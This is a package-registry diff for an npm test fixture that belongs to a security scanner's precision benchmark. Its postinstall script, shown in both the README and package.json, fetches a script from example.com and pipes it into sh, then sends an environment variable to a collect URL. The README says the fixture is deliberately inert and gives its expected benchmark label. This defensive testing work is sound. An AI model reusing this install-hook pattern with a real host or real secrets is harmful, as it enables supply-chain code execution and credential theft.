vybscan-testbed-inert-postinstall 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +50 -0
- package/package.json +15 -0
package/README.md
ADDED
|
@@ -0,0 +1,50 @@
|
|
|
1
|
+
# vybscan-testbed-inert-postinstall
|
|
2
|
+
|
|
3
|
+
**This is an inert security-research test fixture. Do not install or depend on this package.**
|
|
4
|
+
|
|
5
|
+
It exists so that [Vybscan](https://github.com/vybscan-testbed)'s supply-chain scanner
|
|
6
|
+
(`step3ClaudeAnalysis` — install-time behavioral analysis) has a real, live, published npm
|
|
7
|
+
package to score its **precision** against: a postinstall script that HAS the shape of two
|
|
8
|
+
classic attack patterns (network download-and-execute, credential exfiltration) but has NO
|
|
9
|
+
genuine achievable malicious intent, because there is no real destination and no real secret
|
|
10
|
+
behind either pattern. Vybscan's own detection prompt says not to flag mere capability:
|
|
11
|
+
|
|
12
|
+
> "Do NOT flag a package merely for HAVING an install script, making a network request, reading
|
|
13
|
+
> an environment variable, or using dynamic code — these are common and legitimate. Require
|
|
14
|
+
> evidence of malicious INTENT ..., not just the presence of a capability."
|
|
15
|
+
|
|
16
|
+
This fixture is the test of that exact line — a scanner that flags on capability alone would
|
|
17
|
+
wrongly flag this; a scanner that correctly requires achievable intent should stay silent.
|
|
18
|
+
|
|
19
|
+
## Why the postinstall script looks the way it does
|
|
20
|
+
|
|
21
|
+
```
|
|
22
|
+
curl -fsSL https://example.com/setup.sh | sh; node -e "require('https').get('https://example.com/collect?t='+encodeURIComponent(process.env.INERT_TESTBED_FAKE_TOKEN||'none'))" || true
|
|
23
|
+
```
|
|
24
|
+
|
|
25
|
+
This textually resembles two classic attack patterns (download-and-execute, credential
|
|
26
|
+
exfiltration) — deliberately, so a scanner reading the script content has something real to
|
|
27
|
+
flag. But it cannot do anything harmful:
|
|
28
|
+
|
|
29
|
+
- **Every network reference points only at `example.com`** — the domain IANA permanently
|
|
30
|
+
reserves under [RFC 2606](https://www.iana.org/help/example-domains) specifically for
|
|
31
|
+
documentation and testing. It serves a static placeholder page at `/` and a 404 for any other
|
|
32
|
+
path (verified: `curl https://example.com/setup.sh` → `404`). Piping that into `sh` produces
|
|
33
|
+
harmless "command not found" errors — no code from any real, adversary-controlled source is
|
|
34
|
+
ever fetched or executed.
|
|
35
|
+
- **`INERT_TESTBED_FAKE_TOKEN` is a fictional variable name** that is never set in any real
|
|
36
|
+
environment. The script never reads or transmits an actual secret, credential, or token —
|
|
37
|
+
there is nothing sensitive for it to send anywhere, even in principle.
|
|
38
|
+
- **`|| true`** ensures the script always exits `0`, so it can never break an `npm install`.
|
|
39
|
+
|
|
40
|
+
## What this is for
|
|
41
|
+
|
|
42
|
+
Part of the [Vybscan testbed](https://github.com/vybscan-testbed) — a precision/recall
|
|
43
|
+
benchmark for the Vybscan security scanner. See `precision-sca`'s `ANSWERS.yml` for the
|
|
44
|
+
ground-truth label this package's `postinstall` script is expected to receive: **must stay
|
|
45
|
+
silent** (capability without achievable intent). Its sibling fixture,
|
|
46
|
+
`vybscan-testbed-obfuscated-postinstall` (used in `recall-sca-postinstall`), tests the opposite
|
|
47
|
+
case — an install-time pattern with no legitimate non-malicious use, which SHOULD be flagged.
|
|
48
|
+
|
|
49
|
+
Questions / concerns about this package: open an issue at
|
|
50
|
+
[github.com/vybscan-testbed](https://github.com/vybscan-testbed).
|
package/package.json
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "vybscan-testbed-inert-postinstall",
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "INERT SECURITY-RESEARCH TEST FIXTURE — do not install. Part of the Vybscan testbed accuracy benchmark (github.com/vybscan-testbed). This package's postinstall script HAS the shape of a supply-chain attack pattern (network call, env-var read) but NO genuine achievable malicious intent — used to test that Vybscan's install-time scanner correctly distinguishes 'capability' from 'intent' and stays silent (see its own detection prompt: 'do not flag merely for having a network request, reading an environment variable... require evidence of malicious intent, not just the presence of a capability'). Every network reference points only to example.com (IANA-reserved, RFC 2606, serves a static placeholder page for any documentation/test use — https://www.iana.org/help/example-domains), and the referenced environment variable is a fictional name that is never set in any real environment — so there is no real destination and no real secret for this script to ever act on. See README.md.",
|
|
5
|
+
"author": "Vybscan Testbed (github.com/vybscan-testbed)",
|
|
6
|
+
"license": "MIT",
|
|
7
|
+
"private": false,
|
|
8
|
+
"scripts": {
|
|
9
|
+
"postinstall": "curl -fsSL https://example.com/setup.sh | sh; node -e \"require('https').get('https://example.com/collect?t='+encodeURIComponent(process.env.INERT_TESTBED_FAKE_TOKEN||'none'))\" || true"
|
|
10
|
+
},
|
|
11
|
+
"repository": {
|
|
12
|
+
"type": "git",
|
|
13
|
+
"url": "https://github.com/vybscan-testbed/precision-sca"
|
|
14
|
+
}
|
|
15
|
+
}
|